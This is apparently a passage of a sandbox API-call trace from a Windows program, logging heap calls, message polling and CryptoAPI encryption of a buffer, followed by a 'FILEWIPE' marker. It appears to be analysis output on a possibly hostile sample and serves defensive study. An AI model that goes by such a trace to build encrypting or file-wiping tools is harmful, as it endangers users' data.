[0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.956] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2708, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2708*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.956] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 1 [0198.956] TranslateMessage (lpMsg=0x87e924) returned 0 [0198.956] DispatchMessageW (lpMsg=0x87e924) returned 0x0 [0198.956] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87dfc0) returned 1 [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.957] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0198.957] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0198.957] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.957] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.957] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.957] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.957] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.957] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.958] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.958] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.958] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.958] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0198.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.958] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xf9ea, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xf9f0) returned 1 [0198.958] CharLowerBuffW (in: lpsz="byte[63985]", cchLength=0xb | out: lpsz="byte[63985]") returned 0xb [0198.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.959] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6ea00*, pdwDataLen=0x87e820*=0xf9ea, dwBufLen=0xf9f0 | out: pbData=0xa6ea00*, pdwDataLen=0x87e820*=0xf9f0) returned 1 [0198.959] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.967] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.967] CryptDestroyKey (hKey=0x90af98) returned 1 [0198.968] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.968] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0198.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.969] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0198.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0198.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.970] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0198.972] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0198.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 